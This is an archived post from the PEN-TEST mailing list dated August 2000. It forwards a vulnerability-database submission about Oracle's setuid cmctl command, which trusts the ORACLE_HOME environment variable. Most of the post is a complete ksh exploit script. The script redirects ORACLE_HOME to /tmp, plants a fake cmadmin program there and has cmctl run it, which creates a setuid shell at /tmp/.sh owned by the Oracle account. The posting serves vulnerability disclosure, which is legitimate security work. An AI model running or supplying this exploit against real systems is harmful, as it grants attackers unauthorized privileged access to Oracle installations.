Penetration Testing mailing list archives
[PEN-TEST] Oracle cmctl exploit - addendum for BugTraq ID 170 (fwd)
From: Alfred Huger <ah () SECURITYFOCUS COM>
Date: Thu, 31 Aug 2000 11:13:14 -0700
Hey folks, this came into our Vulnerability Database today - I thought it might be relevant given our current thread on Oracle/SQL et al. Alfred Huger VP of Engineering SecurityFocus.com ---------- Forwarded message ---------- Date: Thu, 31 Aug 2000 13:58:33 -0400 From: Kevin Wenchel <kevin.wenchel () jhuapl edu> To: vuldb () securityfocus com Subject: Oracle cmctl exploit - addendum for BugTraq ID 170 Just an addendum to ID 170 in the Bugtraq database. ID 170 lists several Oracle setuid executables that are "believed to contain security vulnerabilities", although no exploit info is given. Attached is an exploit I created recently for the "cmctl" command. The Oracle cmctl command trusts the integrity of the ORACLE_HOME and ORA_HOME environment variables. When you run the command "cmctl start cmadmin", cmctl looks under $ORACLE_HOME\bin for an executable called "cmadmin" and runs it. By modifying $ORACLE_HOME you can have all sorts of fun with the Oracle account. -Kevin
#! /usr/bin/ksh ############################################# # # cmctl is installed setuid to Oracle # by default. See BugTraq ID 170 and Oracle # bug id 701297 and 714293. # # This script will create a setuid Oracle shell, # /tmp/.sh # # redirect environment variables export ORACLE_HOME=/tmp export ORAHOME=/tmp mkdir /tmp/bin chmod a+rx /tmp/bin # create cmadmin script cat <<EOF > /tmp/bin/cmadmin cp /bin/sh /tmp/.sh chmod u+s /tmp/.sh chmod a+rx /tmp/.sh EOF chmod a+rx /tmp/bin/cmadmin # run cmctl to crete Oracle setuid shell /oracle/products/V815/bin/cmctl start cmadmin
Current thread:
- [PEN-TEST] Oracle cmctl exploit - addendum for BugTraq ID 170 (fwd) Alfred Huger (Aug 31)